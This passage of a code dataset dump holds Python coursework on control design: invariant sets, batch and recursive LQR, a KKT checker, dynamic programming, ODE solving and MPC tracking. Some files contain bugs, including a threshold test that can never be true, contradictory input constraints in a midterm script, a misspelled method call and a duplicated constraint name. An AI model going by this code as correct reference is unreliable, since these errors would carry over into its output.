else:\n Omega0 = P\n if i == maxIterations:\n converged = 0\n else:\n converged = 1\n return Cinf, converged\n\n\nA = np.array([[0.5, 0],\n [1.0, -0.5]])\n\nX = pt.Polytope(np.array([[1.0, 0], \n [0, 1.0],\n [-1, 0],\n [0, -1]]), \n np.array([[10.0], \n [10.0],\n [10.0],\n [10.0]]))\n\nOinf, converged = max_pos_inv(A,S)\n\nif False:\n fig, ax = plt.subplots()\n Oinf.plot(ax, color='g', alpha=0.5, linestyle='solid', linewidth=1, edgecolor=None)\n ax.autoscale_view()\n ax.axis('equal')\n plt.show()\n\n# Example 10.6 (Figure 10.8) MPC book\n\nA = np.array([[1.5, 0],\n [1.0, -1.5]])\n\nB = np.array([[1.0], \n [0.0]])\nX = pt.Polytope(np.array([[1.0, 0], \n [0, 1.0],\n [-1, 0],\n [0, -1]]), \n np.array([[10.0], \n [10.0],\n [10.0],\n [10.0]]))\n\nU = pt.Polytope(np.array([[1.0], \n [-1.0]]),\n np.array([[5.0], \n [5.0]]))\n\nCinfset, converged = max_cntr_inv(A, B, X, U)\nif False:\n fig, ax = plt.subplots()\n X.plot(ax, color='b')\n Cinfset.plot(ax, color='r')\n ax.legend(['X', 'C_inf'])\n ax.autoscale_view()\n ax.axis('equal')\n plt.show() "
},
{
"alpha_fraction": 0.5045597553253174,
"alphanum_fraction": 0.5455148220062256,
"avg_line_length": 22.01526641845703,
"blob_id": "337f1c605bf1be838447904849d0c9324ef03fc0",
"content_id": "751dbae00cc11c327fff66d4f874b692ba4937f9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6031,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 262,
"path": "/py_files/HW4_FTOC.py",
"repo_name": "ZionDeng/Advanced-Control-Design",
"src_encoding": "UTF-8",
"text": "# Finite Time Optimal Control \n\n# %% vehicle \n\nimport matplotlib.pyplot as plt \nimport numpy as np \nimport pyomo.environ as pyo \n\nTs = .2 \nN = 70\nTFinal = Ts * N\n\nz0Bar = np.array([0,3,0,0])\nzNBar = np.array([0,0,0,-np.pi/2])\nzMax = np.array([20,10,10,2*np.pi])\nzMin = np.array([-20,-.2,-10,-2*np.pi])\numin = [-0.3,-0.6]\numax = [0.3,0.6]\n\nnz = 4\nnu = 2 \nl_r = 1.738 \n\nm = pyo.ConcreteModel()\nm.tidx = pyo.Set(initialize = range(N+1))\nm.zidx = pyo.Set(initialize = range(nz))\nm.uidx = pyo.Set(initialize = range(nu))\n\nm.z = pyo.Var(m.zidx,m.tidx)\nm.u = pyo.Var(m.uidx,m.tidx)\n\nm.cost = pyo.Objective(\n expr = sum((m.z[i,t] - zNBar[i])**2 for i in m.zidx for t in m.tidx \n if t > N-3 and t<N+1),\n sense = pyo.minimize\n)\n\nm.c11 = pyo.Constraint(\n m.tidx, rule = lambda m,t:\n m.z[0,t+1] == m.z[0,t] + Ts * (m.z[2,t]* pyo.cos(m.z[3,t]+m.u[1,t]))\n if t < N else pyo.Constraint.Skip\n)\nm.c12 = pyo.Constraint(\n m.tidx, rule = lambda m,t:\n m.z[1,t+1] == m.z[1,t] + Ts * (pyo.sin(m.z[3,t]+m.u[1,t]))\n if t < N else pyo.Constraint.Skip\n)\nm.c13 = pyo.Constraint(\n m.tidx, rule = lambda m,t:\n m.z[2,t+1] == m.z[2,t] +Ts* m.u[0,t]\n if t < N else pyo.Constraint.Skip\n) \nm.c14 = pyo.Constraint(\n m.tidx, rule = lambda m,t:\n m.z[3,t+1] == m.z[3,t] + Ts * (m.z[2,t]/l_r * pyo.sin(m.u[1,t]))\n if t < N else pyo.Constraint.Skip\n)\n# zmin <= zk <= zmax \nm.c21 = pyo.Constraint(\n m.zidx,m.tidx, rule = lambda m,i,t:\n m.z[i,t] <= zMax[i]\n if t< N else pyo.Constraint.Skip\n)\nm.c22 = pyo.Constraint(\n m.zidx,m.tidx, rule = lambda m,i,t:\n m.z[i,t] >= zMin[i]\n if t< N else pyo.Constraint.Skip\n)\n# umin <= uk <= umax\nm.c31 = pyo.Constraint(\n m.uidx, m.tidx, rule = lambda m,i,t:\n m.u[i,t] <= umax[i]\n if t <N else pyo.Constraint.Skip\n)\nm.c32 = pyo.Constraint(\n m.uidx, m.tidx, rule = lambda m,i,t:\n m.u[i,t] >= umin[i]\n if t <N else pyo.Constraint.Skip\n)\n# |beta_k+1 - beta_k| <= beta_d\nm.c41 = pyo.Constraint(\n m.tidx, rule = lambda m,t:\n m.u[1,t+1] - m.u[1,t] <= 0.2 \n if t < N-1 else pyo.Constraint.Skip\n)\nm.c41 = pyo.Constraint(\n m.tidx, rule = lambda m,t:\n m.u[1,t+1] - m.u[1,t] >= -0.2 \n if t < N-1 else pyo.Constraint.Skip\n)\n\nm.c5 = pyo.Constraint(\n m.zidx, rule = lambda m,i:\n m.z[i,0] == z0Bar[i]\n)\nm.c6 = pyo.Constraint(\n m.zidx, rule = lambda m,i:\n m.z[i,N] == zNBar[i]\n)\n\n# results = pyo.SolverFactory('ipopt').solve(m).write()\n\n\nimport numpy as np \nfrom scipy.linalg import block_diag\nfrom numpy.linalg import inv \n\ndef Sx_Su(A,B,N):\n\n nX = np.size(A,0)\n nU = np.size(B,1)\n Sx = np.eye(nX)\n\n A_tmp = A\n for i in range(N):\n Sx = np.vstack((Sx,A_tmp))\n A_tmp = A_tmp @ A \n\n SxB = Sx @ B \n Su = np.zeros((nX*(N+1),nU * N))\n for j in range(N):\n Su_tmp = np.vstack((np.zeros((nX,nU)),SxB[:-nX,:]))\n Su[:,j] = Su_tmp.reshape(Su_tmp.shape[0],)\n SxB = Su_tmp\n \n return Sx, Su \n\ndef lqrBatch(A,B,Q,R,PN,N):\n Sx, Su = Sx_Su(A,B,N)\n Qbar = block_diag(np.kron(np.eye(N),Q),PN)\n Rbar = np.kron(np.eye(N),R)\n QSu = Qbar @ Su\n H = Su.T @ QSu + Rbar\n F = Sx.T @ QSu\n K = -inv(H) @ F.T \n P0 = F@K + Sx.T @ Qbar @ Sx\n\n return K,P0\n\nA = np.array([.77, -0.35, 0.49, 0.91]).reshape((2,2))\nB = np.array([0.04,0.15]).reshape((2,1))\nQ = np.diag([500,100])\nR = 1 \nPN = np.diag([1500,100])\nx0 = np.array([1,-1]).T\nN = 5\n\nK,P0 = lqrBatch(A,B,Q,R,PN,N)\nU0_star = K @ x0\nJ0_star = x0.T @ P0 @ x0\n\n# print('u0* = ',U0_star)\n# print('J0* = ',J0_star)\n\n\nQbar = block_diag(np.kron(np.eye(N),Q),PN)\nRbar = np.kron(np.eye(N),R)\nSx, Su = 
Sx_Su(A,B,N)\nQSu = Qbar @ Su\nH = Su.T @ QSu +Rbar\nF = Sx.T @ QSu\n\nP = 2*H \nq = 2 * x0.T @ F \n\nimport cvxopt\n\nP = cvxopt.matrix(P,tc= 'd')\nq = cvxopt.matrix(q,tc= 'd')\nsol = cvxopt.solvers.qp(P,q)\n# print('u* = ', sol['x'])\n# print('J* = ', sol['primal objective'] + x0.T @ Sx.T @ Qbar @ Sx @ x0)\n\n\n# %% unconstrained linear finite time optimal control \n\nnx = np.size(A,0)\nnu = np.size(B,1)\n\nP = np.zeros((nx,nx,N+1))\nF = np.zeros((nu,nx,N))\n# ----------------pay attention to size here----------------\n\nfor i in range(N-1,-1,-1):\n # F[:,:,-1] = - inv(B.T @P[:,:,i+1] @B + R)@B.T @P[:,:,i+1] @ A \n P_k1 = P[:,:,i+1]\n F[:,:,i] = -inv(B.T @ P_k1 @ B +R) @ B.T @ P_k1 @ A\n P[:,:,i] = A.T @ P_k1 @A + Q +A.T @P_k1 @B@ F[:,:,i]\n\nJopt_DP = x0.T @ P[:,:,0] @ x0\n# print('opt cost from recursive approach: ',Jopt_DP)\n\ndef sysSim(A,B,D,w,xCurr,uCurr):\n x_next = A @ xCurr + B* uCurr + D * w \n return x_next\n\nD = np.array([[.1],[.1]])\nw = np.random.normal(0,10,N)\n# print(N)\n\nx_batch = [x0.reshape((2,1))]\nx_recursive = [x0.reshape((2,1))]\n\nfor i in range(N):\n x_batch.append(sysSim(A,B,D,w[i],x_batch[0],U0_star[i]))\n x_recursive.append(sysSim(A,B,D,w[i],x_recursive[i],F[:,:,i] @ x_recursive[i]))\n\nt_grid = np.arange(N+1)\n\nx_batch = np.array(x_batch)\nx_recursive = np.array(x_recursive)\n\nif False:\n plt.plot(t_grid,x_batch[:,0],x_recursive[:,0])\n plt.legend(['state 1 batch','state 1 dyn'],loc = 'best')\n plt.show()\n\n# %% Constrained finite time optimal control \nAx = np.array([1,1,0,1]).reshape((2,2))\nBx = np.array([0,1]).reshape((2,1))\nQ = np.eye(2)\nP = np.eye(2)\nR = 0.1 \nN = 3 \nx0 = np.array([-1,-1]).reshape((2,1))\n\nULlim = -1\nUUlim = 1\nxLlim = [-15,-15]\nxUlim = [15,15]\n\nQbar = block_diag(np.kron(np.eye(N),Q),P)\nRbar = np.kron(np.eye(N),R)\nSx, Su = Sx_Su(A,B,N)\nQSu = Qbar @ Su\nH = Su.T @ QSu +Rbar\nF = Sx.T @ QSu\nK = -inv(H) @F.T\nP0 = F@K + Sx.T @ Qbar @ Sx\nnX = 2 \n\nA = np.concatenate([np.kron(np.array([[1],[-1]]),np.eye(3)), Su, -Su], axis = 0)\nb = np.concatenate([np.ones((nX*N,1)), 15*np.ones((2*nX*(N+1),1))-np.concatenate([Sx,-Sx], axis = 0)@x0], axis = 0)\n\nc = x0.T @ Sx.T @ Qbar @ Sx @ x0\n\nP = 2*H \nq = 2 * x0.T @ F \n\nP = cvxopt.matrix(P, tc='d')\nq = cvxopt.matrix(q.T, tc='d')\nG = cvxopt.matrix(A, tc='d')\nh = cvxopt.matrix(b, tc='d')\n\nfrom ttictoc import tic,toc \n\ntic()\nsol = cvxopt.solvers.qp(P,q,G,h)\nt_dense = toc()\n\nJopt_dense = sol['primal objective'] + c \nprint('opt cost= ', Jopt_dense)\n\n"
},
{
"alpha_fraction": 0.5353440046310425,
"alphanum_fraction": 0.5645617246627808,
"avg_line_length": 19,
"blob_id": "0f8ef0e735fe9edcb8ab9dd597ee7bcfbf2fc110",
"content_id": "059e53f0bae3a4c6fc9e843a7ea97a2c8a626448",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1061,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 53,
"path": "/midterm_exam/C1.py",
"repo_name": "ZionDeng/Advanced-Control-Design",
"src_encoding": "UTF-8",
"text": "\nimport matplotlib.pyplot as plt\nimport numpy as np \nimport pyomo.environ as pyo\n\nN = 50\nxNbar = 1\nx0 =0 \nm = pyo.ConcreteModel()\nm.tidx = pyo.Set(initialize = range(N+1))\nm.u = pyo.Var(m.tidx)\nm.x = pyo.Var(m.tidx)\n\nm.cost = pyo.Objective(\n expr = sum((m.x[t]-xNbar) ** 2 for t in m.tidx),\n sense= pyo.minimize \n \n)\n\nm.c1 = pyo.Constraint(\n m.tidx, rule = lambda m,t:\n m.x[t+1] == pyo.sin(m.x[t]) + m.u[t]\n if t < N else pyo.Constraint.Skip\n)\nm.c21 = pyo.Constraint(\n m.tidx, rule = lambda m,t:\n m.u[t] <= -0.2\n if t<N else pyo.Constraint.Skip\n)\nm.c22 = pyo.Constraint(\n m.tidx, rule = lambda m,t:\n m.u[t] >= 0.2\n if t<N else pyo.Constraint.Skip\n)\nm.c31 = pyo.Constraint(\n expr = m.x[N] -xNbar <= -0.1\n)\nm.c32 = pyo.Constraint(\n expr = m.x[N] -xNbar >= 0.1\n)\nm.c4 = pyo.Constraint(expr = m.x[0] == x0)\n\nresults = pyo.SolverFactory('ipopt').solve(m).write()\n\nx= [m.x[0]()]\nu= [m.u[0]()]\nfor t in m.tidx:\n if t< N: \n x.append(m.x[t]())\n \n if t< N-1:\n u.append(m.u[t]())\nplt.plot(x)\nplt.show()\n"
},
{
"alpha_fraction": 0.5690531134605408,
"alphanum_fraction": 0.5884526371955872,
"avg_line_length": 28.2702693939209,
"blob_id": "eb31c54aade2579520cc83b51e0b91182f706ac9",
"content_id": "f8057486dda4b998b7fac0578da22789b53c2dfa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2165,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 74,
"path": "/py_files/Lab4_KKT.py",
"repo_name": "ZionDeng/Advanced-Control-Design",
"src_encoding": "UTF-8",
"text": "# KKT conditions \n\n# %% quadratic programming example \n\nimport numpy as np \nimport pyomo.environ as pyo \nfrom pyomo.opt import TerminationCondition\n\nThreshold = 1e-5 \n\nmodel = pyo.ConcreteModel()\nmodel.z1 = pyo.Var()\nmodel.z2 = pyo.Var()\n\nmodel.obj = pyo.Objective(expr = model.z1 **2 + model.z2**2)\n# model.cons1 = pyo.Constraint(expr = 1 <= model.z1)\n# model.cons2 = pyo.Constraint(expr = 1 <= model.z2)\nmodel.cons1 = pyo.Constraint(expr = -model.z1 <= -1)\nmodel.cons2 = pyo.Constraint(expr = -model.z2 <= -1)\n# ---------------------only in the <= form ----------------------------------\n\n\nmodel.dual = pyo.Suffix(direction = pyo.Suffix.IMPORT)\n\nresult = pyo.SolverFactory('ipopt').solve(model)\nprint('dual1 = ',model.dual[model.cons1])\nprint('dual2 = ',model.dual[model.cons2])\nprint('z1*_solver = ',model.z1())\nprint('z2*_solver = ',model.z2())\nprint('opt_value = ',model.obj())\n\n# %% check the status \nif result.solver.termination_condition is not TerminationCondition.optimal:\n KKTsat = False \nelse:\n A = -np.eye(2)\n b= -np.ones((2,1))\n zOpt = np.array([model.z1(),model.z2()])\n u = []\n for c in model.component_objects(pyo.Constraint,active = True):\n print('Constraint',c)\n for i in c:\n u.append(model.dual[c[i]])\n# -------------pay attention to here !!!------------\n print(model.dual[c[i]])\n\n u = np.asarray(u)\n for i in range(len(u)):\n if u[i] < Threshold and u[i] > Threshold:\n u[i] = 0\n \n flag_primal = np.any(\n np.all(A @ zOpt <= b + Threshold) or \n np.all(A @ zOpt <= b - Threshold) \n )\n\n flag_dual = np.all(u >=0 )\n\n flag_cs = np.all(np.multiply(u,(A@zOpt-b)) < Threshold) and np.all(np.multiply(u,(A@zOpt-b)) > -Threshold)\n\n grad_lagrangian = [2*zOpt[0],2*zOpt[1]] + u.T @ A \n\n for i in range(len(grad_lagrangian)):\n if grad_lagrangian[i] < Threshold and grad_lagrangian[i] > -Threshold:\n grad_lagrangian[i] = 0 \n flag_grad = np.all(grad_lagrangian ==0)\n\n flags = [flag_primal,flag_dual,flag_cs,flag_grad]\n if np.all(np.array(flags)==1):\n KKTsat = True\n else:\n KKTsat = False \n\nprint(KKTsat)"
},
{
"alpha_fraction": 0.5378531217575073,
"alphanum_fraction": 0.5793785452842712,
"avg_line_length": 25.81818199157715,
"blob_id": "e7aff05ff01f8af667fd7ad4208ecbf1837f4eff",
"content_id": "a855fbb7cd6091c91cd7a3588532bd71a34a6330",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3540,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 132,
"path": "/py_files/Lab7_DP.py",
"repo_name": "ZionDeng/Advanced-Control-Design",
"src_encoding": "UTF-8",
"text": "# constrained finite time optimal control \n\nimport numpy as np \nfrom scipy import interpolate\nimport multiprocessing\n\n# pool = multiprocessing.Pool(4)\n# print(np.array(range(3)).reshape((3,1)))\n\nA = np.array([1,1,0,1]).reshape((2,2))\nB = np.array([0,1]).reshape((2,1))\n\nNX = 2 \nNU = 1 \n\n\ndef f_dyn(x,u):\n return A @ np.array([x]).reshape((NX,1)) + B @ np.array([u]).reshape((NU,1))\n\nxmin = -15\nxmax = 15 \n\numin = -1 \numax = 1 \n\nN = 3 # horizon \n\nQ = np.eye(NX)\nR = np.array([0.1]).reshape((NU,NU))\nPN = Q \n\n# create function for state cost and 'optimal cost-to-go'\n# cost-to-go is a function of the state and changes with time, \n# store this as a dictionary \n\ndef J_stage(x,u):\n x = np.array([x]).reshape(NX,1)\n u = np.array([u]).reshape(NU,1)\n return x.T @ Q @ x + u.T @ R @ u # return state cost \n\nJopt = {}\nUopt = {}\n\n# grid the x under the constraint \nNx_grid = 50 \nx1_grid = np.linspace(xmin,xmax,Nx_grid)\nx2_grid = np.linspace(xmin,xmax,Nx_grid)\npoints = (x1_grid,x2_grid)\n\n# grid the input space \nNu_grid = 21 \nu_grid = np.linspace(umin,umax,Nu_grid)\n\n# Allocate memory for Jopt and Uopt arrays\n# Jopt[N] is a known, quadratic function (from PN).\nJopt_array = np.nan * np.zeros((Nx_grid,Nx_grid,N+1))\nUopt_array = np.nan * np.zeros((Nx_grid,Nx_grid,N))\n\nfor idx1,x1 in enumerate(x1_grid):\n for idx2,x2 in enumerate(x2_grid):\n x = np.array([x1,x2]).reshape(NX,)\n Jopt_array[idx1,idx2,N] = x.T @ PN @ x\n\n# interpolate the Jopt and Uopt\ndef Jopt_interpolate(x,j):\n return interpolate.interpn(points,Jopt_array[:,:,j],x.flatten())\ndef Uopt_interpolate(u,j):\n return interpolate.interpn(points,Uopt_array[:,:,j],x.faltten())\n\n\n\n\nfor j in reversed(range(N)):\n print('Computing J:',j)\n\n # initialize Jopt_array-1 and uPolicy[j] matrix at iteration\n # loop over the 2-D grid in X\n\n for idx1, x1 in enumerate(x1_grid):\n for idx2,x2 in enumerate(x2_grid):\n xi = np.array([x1,x2]).reshape(NX,)\n\n def fun(u):\n J_j = J_stage(xi,u).flatten() + Jopt_interpolate(f_dyn(xi,u),j+1).flatten()\n return J_j\n\n J_best = np.inf\n U_best = np.NaN\n for u_val in u_grid:\n xi_next = f_dyn(xi,u_val)\n if np.all(xi_next >= xmin) and np.all(xi_next <= xmax):\n J_act = fun(u_val)\n if J_act < J_best:\n U_best = u_val\n J_best = J_act\n Jopt_array[idx1,idx2,j] = J_best\n Uopt_array[idx1,idx2,j] = U_best\nx = np.array([-1,-1])\nprint(Jopt_interpolate(x,0))\n\n\nfrom mpl_toolkits.mplot3d.axes3d import Axes3D\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\n\nfig, ax = plt.subplots(1, N, figsize=(12, 6))\nfor j in range(N):\n ax[j].contour(Jopt_array[:,:,j], 20, cmap=cm.RdBu, extent=[-15, 15, -15, 15])\n ax[j].set_xlim(-15, 15)\n ax[j].set_ylim(-15, 15)\n ax[j].axis('square')\n plt.xlabel('x1')\n plt.ylabel('x2')\n fig.tight_layout(rect=[0, 0.03, 1, 0.95])\n\nfig = plt.figure(figsize=(12, 6))\nfor j in range(N):\n ax = fig.add_subplot(1, N, j+1)\n ax.imshow(Jopt_array[:,:,j], origin='lower', extent=(-15,15,-15,15))\n ax.axis([-15, 15, -15, 15])\n plt.xlabel('x1')\n plt.ylabel('x2')\n \nfig = plt.figure(figsize=(12, 6))\nfor j in range(N):\n ax = fig.add_subplot(1, N, j+1)\n ax.imshow(Uopt_array[:,:,j], origin='lower', extent=(-15,15,-15,15))\n ax.axis([-15, 15, -15, 15])\n plt.xlabel('x1')\n plt.ylabel('x2')\n\nplt.show()\n"
},
{
"alpha_fraction": 0.5130694508552551,
"alphanum_fraction": 0.5578790307044983,
"avg_line_length": 18.705883026123047,
"blob_id": "853142c12e8bac40f8f652a02f3fb55268cc6364",
"content_id": "49f633fa9389ecd0ac813bc5767df4da370f8d59",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1339,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 68,
"path": "/py_files/lab1_ode.py",
"repo_name": "ZionDeng/Advanced-Control-Design",
"src_encoding": "UTF-8",
"text": "# scipy.intergrate.solve_ivp \nfrom scipy.integrate import solve_ivp\nimport numpy as np \nimport matplotlib.pyplot as plt \n\n# %% solve differential equation \n# x0 = 1, t0 = 0, tf = 20 \n\ndef exp_ode(t,x):\n return np.exp(-x)\n\nx0 = np.array([1])\nt0 = 0 \ntf = 20 \n\n# sol = solve_ivp(exp_ode,[t0,tf], x0) \nsol = solve_ivp(lambda t,x: np.exp(-x),[t0,tf],x0)\n# plt.plot(sol.t,sol.y[0])\n# plt.show()\n\n# %% \n\nsol = solve_ivp(lambda t,x: -x * np.exp(t),[0,5],[1])\n# plt.plot(sol.t,sol.y[0])\n# plt.show()\n\n# %% \nsol = solve_ivp(lambda t,x: (-0.2 + np.sin(t)) * x,[0,5],[5],'RK45',rtol = 1e-6)\n# plt.plot(sol.t,sol.y[0])\n# plt.show()\n\n\n# %% \na0, a1, b0, tf = -2.5, 0.05, 0.25, 15 \n\nx0 = [np.pi/4, 0]\n\ndef dyn_ode(t,x):\n theta, thetadot = x\n return [thetadot, -a0 *np.sin(theta) - a1* thetadot + b0* np.cos(theta)]\n# ---------------WHERE IS U HERE--------------------------??\n\nsol = solve_ivp(dyn_ode,[t0,tf],x0,rtol= 1e-7)\n\n# plt.plot(sol.t,sol.y[0,:])\n# plt.plot(sol.t,sol.y[1,:])\n# plt.show()\n\n# %% analytical differentiation \nimport sympy as sym \n\nx = sym.Symbol('x')\nA = sym.Matrix(np.eye(4) * x)\n# print(A)\n\nA_val = A.subs(x,3)\n# print(A_val)\n\nx, y, z = sym.symbols('x y z')\nJacob = sym.Matrix(\n [sym.cos(y) + x, sym.sin(x) + y, z]\n).jacobian([x,y,z])\n# print(Jacob)\n\nJacob_val = Jacob.subs([\n (x,0), (y, np.pi/4)\n])\nprint(Jacob_val)"
},
{
"alpha_fraction": 0.5270795822143555,
"alphanum_fraction": 0.5506472587585449,
"avg_line_length": 33.64788818359375,
"blob_id": "d7873dd9f9827edbe01e0ce972e53bc1642ecb18",
"content_id": "1c9c6c9c344117e08022aa7718e73414c8281f51",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 17227,
"license_type": "no_license",
"max_line_length": 150,
"num_lines": 497,
"path": "/py_files/Lab11_MPCII.py",
"repo_name": "ZionDeng/Advanced-Control-Design",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport scipy.signal\nimport scipy.linalg\nfrom scipy.integrate import solve_ivp\nimport matplotlib.pyplot as plt\n# from __future__ import division\nimport pyomo.environ as pyo\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import signal\n\n\nTs = 0.1 # Ts is the discrete sample-time. \n\n\nAc = np.array([[0, 1],\n [2.5, -0.05]])\nBc = np.array([[0],\n [2.5]])\n\nCc = np.array([1, 0])\n# We don't need D here. This is just for calling the function\nDc = np.zeros((1,1))\nsystem = (Ac, Bc, Cc, Dc)\nA, B, C, D, dt = scipy.signal.cont2discrete(system, Ts)\n\nQ = np.diag([100,1])\nR = np.array([1]).reshape(1,1)\nP = Q\nN = 6\n\nuU = 1.75\nuL = -1.75\nx1U = np.pi/2\nx2U = np.pi\n\nC = C.reshape(1,2)\n\n# %% case one: full review \n# Setup optimization problem\ndef solve_cftoc(A, B, P, Q, R, N, x0, x1U, x2U, uL, uU, xref, uref):\n \n model = pyo.ConcreteModel()\n model.N = N\n model.nx = np.size(A, 0)\n model.nu = np.size(B, 1)\n\n \n # length of finite optimization problem:\n model.tIDX = pyo.Set( initialize= range(model.N+1), ordered=True )\n model.xIDX = pyo.Set( initialize= range(model.nx), ordered=True )\n model.uIDX = pyo.Set( initialize= range(model.nu), ordered=True )\n \n \n # these are 2d arrays:\n model.A = A\n model.B = B\n model.Q = Q\n model.P = P\n model.R = R\n \n model.xref = xref\n model.uref = uref \n \n # Create state and input variables trajectory:\n model.x = pyo.Var(model.xIDX, model.tIDX)\n model.u = pyo.Var(model.uIDX, model.tIDX, bounds=(uL,uU))\n\n \n #Objective:\n def objective_rule(model):\n costX = 0.0\n costU = 0.0\n costTerminal = 0.0\n for t in model.tIDX:\n for i in model.xIDX:\n for j in model.xIDX:\n if t < model.N:\n costX += (model.x[i, t] - model.xref[i, t]) * model.Q[i, j] * (model.x[j, t] - model.xref[j, t]) \n for t in model.tIDX:\n for i in model.uIDX:\n for j in model.uIDX:\n if t < model.N:\n costU += (model.u[i, t] - model.uref[i, t]) * model.R[i, j] * (model.u[j, t] - model.uref[j, t])\n for i in model.xIDX:\n for j in model.xIDX: \n costTerminal += (model.x[i, model.N] - model.xref[i, model.N]) * model.P[i, j] * (model.x[j, model.N] - model.xref[j, model.N])\n return costX + costU + costTerminal\n \n model.cost = pyo.Objective(rule = objective_rule, sense=pyo.minimize)\n \n # Constraints:\n def equality_const_rule(model, i, t):\n return model.x[i, t+1] - (sum(model.A[i, j] * model.x[j, t] for j in model.xIDX)\n + sum(model.B[i, j] * model.u[j, t] for j in model.uIDX) ) == 0.0 if t < model.N else pyo.Constraint.Skip\n\n model.equality_constraints = pyo.Constraint(model.xIDX, model.tIDX, rule=equality_const_rule)\n model.init_const1 = pyo.Constraint(expr = model.x[0, 0] == x0[0])\n model.init_const2 = pyo.Constraint(expr = model.x[1, 0] == x0[1])\n \n model.state_limit1 = pyo.Constraint(model.tIDX, rule=lambda model, t: model.x[0, t] <= x1U\n if t < N else pyo.Constraint.Skip)\n model.state_limit2 = pyo.Constraint(model.tIDX, rule=lambda model, t: -x1U <= model.x[0, t]\n if t < N else pyo.Constraint.Skip)\n model.state_limit3 = pyo.Constraint(model.tIDX, rule=lambda model, t: model.x[1, t] <= x2U\n if t < N else pyo.Constraint.Skip)\n model.state_limit4 = pyo.Constraint(model.tIDX, rule=lambda model, t: -x2U <= model.x[1, t]\n if t < N else pyo.Constraint.Skip)\n \n solver = pyo.SolverFactory('ipopt')\n results = solver.solve(model)\n \n if str(results.solver.termination_condition) == \"optimal\":\n feas = True\n else:\n feas = False\n \n xOpt = np.asarray([[model.x[i,t]() for i in model.xIDX] for t in 
\n\nnx = np.size(A, 0) # number of states\nnu = np.size(B, 1) # number of inputs\nny = np.size(C, 0) # number of outputs\n\nx0 = np.array([-0.5, 1.0])\nLsim = 70 # length of simulation\nref = []\n\n# Construct reference signal\nfor k in range(Lsim+N+1):\n    if k < 40: \n        ref.append(0)\n    else:\n        ref.append(1)\n\n# Initialize Control Design\n\numpc_closedloop = []\nym = []\nxk_open = np.zeros((nx, N+1)) # to plot open-loop trajectories\nxk_closed = np.zeros((nx, Lsim+1)) # to plot closed-loop trajectories\nxk_closed[:, 0] = x0 # set initial value of closed-loop trajectory\nxk = x0.reshape(2,1)\nfig = plt.figure(figsize=(12, 8))\nax1 = fig.add_subplot(221)\nax2 = fig.add_subplot(222)\n\n# simulate MPC controller\nfor t in range(Lsim):\n\n    # Target Algorithm: construct reference preview\n    ref_preview = [ref[j] for j in range(t, t+N+1)]\n    # compute xref and uref based on the future reference\n    xrefk = np.zeros((nx,N+1))\n    urefk = np.zeros((nu,N))\n    for k in range(N+1):\n        Geq = np.vstack( ( np.hstack( (A-np.eye(nx), B) ), np.hstack( (C , np.zeros((ny,nu))) ) ) )\n        beq = np.concatenate([np.zeros((nx,1)), np.asarray(ref_preview[k]).reshape(1,1)], axis = 0) \n\n        # if Geq is invertible, the target is inv(Geq) @ beq (as in the slides)\n        out = (np.linalg.inv(Geq) @ beq).flatten()\n        xrefk[:, k] = out[0:nx]\n        if k != N:  # use !=, not 'is not', for integer comparison\n            urefk[:, k] = out[nx:nx+nu]\n\n    # Solve MPC \n    [model, feas, xOpt, uOpt, JOpt] = solve_cftoc(A, B, P, Q, R, N, xk.reshape(2,), x1U, x2U, uL, uU, xrefk, urefk)\n    if not feas:\n        print('The problem is infeasible')\n    U = uOpt[0,0]\n    umpc_closedloop.append(U)\n    \n    if (t < (Lsim-N)):\n        # plot open-loop trajectories\n        xk_open[:, 0] = xk.reshape(2,)\n\n        for m in range(N):\n            xk_open[:, m+1] = A @ xk_open[:, m] + B @ uOpt[:, m] \n\n        line1 = ax1.plot(range(t, t+len(ref_preview) ), xk_open[0,:], 'o-', color='b')\n        line2 = ax2.plot(range(t, t+len(ref_preview) ), xk_open[1,:], 'o-', color='b')\n\n    # Plant model update\n    ym.append(C @ xk)\n    xk = A @ xk + B @ np.asarray(U).reshape(1,1)\n    xk_closed[:, t+1] = xk.reshape(2,)\n    \n##################################################################################################################\n##################################################################################################################\n# plot closed-loop trajectories\nline11 = ax1.plot(range(Lsim), xk_closed[0, :Lsim], 'o-', color='r')\nax1.legend([line1[0], line11[0]], ['open-loop trajectory', 'closed-loop trajectory'])\nax1.set_ylabel('x1')\nline22 = ax2.plot(range(Lsim), xk_closed[1, :Lsim], 'o-', color='r')\nax2.legend([line2[0], line22[0]], ['open-loop trajectory', 'closed-loop trajectory'])\nax2.set_ylabel('x2')\n# plt.show()\n\n# Plot Results\nax12 = fig.add_subplot(223)\nax22 = fig.add_subplot(224)\nax12.step(range(len(umpc_closedloop)), umpc_closedloop,'r')\nax12.legend(['u'])\nax22.step(range(len(ym)), np.asarray(ym).reshape(Lsim,), 'r')\nax22.step(range(len(ref)), ref, 'b--')\nax22.legend(['y', 'r'])  # label the two step plots in the order they were drawn\nplt.tight_layout()\nplt.show()\n\n# print('x1=', xrefk[0,:])\n# print('x2=', xrefk[1,:])\n# print('u=', urefk)\n\n\n# %% preview is not available \n\n\n# %% soft constraint \n# state constraint\nx1U = np.pi/4\nx2U = np.pi/2\n\n\n\nnx = np.size(A, 0) # number of states\nnu = np.size(B, 1) # number of inputs\nny = np.size(C, 0) # number of outputs\n\nx0 = np.array([-0.5, 1.0])\nLsim = 70 # 
